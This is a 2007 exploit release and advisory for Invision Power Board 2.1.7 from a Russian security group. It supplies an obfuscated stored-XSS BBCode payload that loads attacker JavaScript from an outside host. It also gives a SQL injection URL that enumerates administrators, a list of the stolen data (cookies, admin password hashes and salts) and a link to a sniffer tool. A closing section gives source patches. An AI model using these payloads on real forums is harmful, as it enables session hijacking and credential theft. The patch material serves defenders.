INVISION POWER BOARD 2.1.7 ACTIVE XSS/SQL INJECTION EXPLOIT
----[ INVISION POWER BOARD 2.1.7 EXPLOIT ... ITDefence.ru Antichat.ru ]
INVISION POWER BOARD 2.1.7
ACTIVE XSS/SQL INJECTION
Eugene Minaev
underwater@xxxxxxxxxxxx
___________________________________________________________________
____/ __ __ _______________________ _______
_______________ \ \ \
/ .\ / /_// // / \ \/
__ \ /__/ /
/ / /_// /\ / / /
/ /___/
\/ / / / / /\ /
/ /
/ / \/ / / / /
/__ //\
\ / ____________/ / \/
__________// /__ // /
/\\ \_______/ \________________/____/ 2007
/_//_/ // //\
\ \\
// // /
.\ \\ -[ ITDEFENCE.ru Security advisory
]- // // / .
.
\_\\________[________________________________________]_________//_//_/ . .
----[ NITRO ... ]
This vulnerability was already found before, but there was no
available
public "figting" exploit for it. This POC consists of several
parts - active xss generator,
JS-file, which will be caused at visiting page with xss, log
viewer and special component,
which will take necessary data from MySQL forum's tables in
case if intercepted session
belonged to the person with moderator privileges.
----[ ANALYSIS ... ]
XSS.php is one of the most important part of IPB 2.1.7 POC
package, as it generates xss for
future injetion on the forum board. As the reference it is
necessary to specify the full way
up to ya.js file (in which you have already preliminary
corrected way on your own). Most likely
it is necessary only to press the button.
[img]http://www.ya.ru/[snapback]
onerror=script=document.createElement(String.fromCharCode(115,99,114,
105,112,116)),script.src=/http:xxdaim.ruxmonzterxforum/.source.replace(/x/g,String.fromCharCode(47)),
head=document.getElementsByTagName(String.fromCharCode(104,101,97,100)).item(0),head.appendChild(script)
style=visibility:hidden =[/snapback].gif[/img]
The injection can be executed only when there is available
session of the user with access
in moderator's panel.It is necessary to result "starter"
parameter to numerical by means of "intval"
function.In case of successfull injection there is an
oppotunity to enumerate forums' administrators team:
index.php?act=mod&f=-6&CODE=prune_finish&pergo=50¤t=50&max=3&starter=1+union+select+1/*
----[ RECORD ... ]
{
---IP ADDRESS sniffed ip address
---REFERER xssed theme
---COOKIES xssed cookies of forum member
---USER ID xssed user id of forum member
---ADMIN NAME admin username
---ADMIN PASS admin pass hash
---ADMIN SALT admin hash salt
}
----[ PATCH ... ]
FILE
sources/classes/bbcode/class_bbcode_core.php
FUNCTION
regex_check_image
LINE
924
REPLACE
if ( preg_match( "/[?&;]/", $url) )
ON
if ( preg_match( "/[?&;\<\[]/", $url) )
FILE
sources/classes/bbcode/class_bbcode_core.php
FUNCTION
post_db_parse_bbcode
LINE
486
REPLACE
preg_match_all(
"#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );
ON
preg_match_all(
"#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );
if ( $row['bbcode_tag'] == 'snapback' )
{
$match[2][$i] = intval( $match[2][$i] );
}
www.underwater.itdefence.ru/isniff.rar
----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]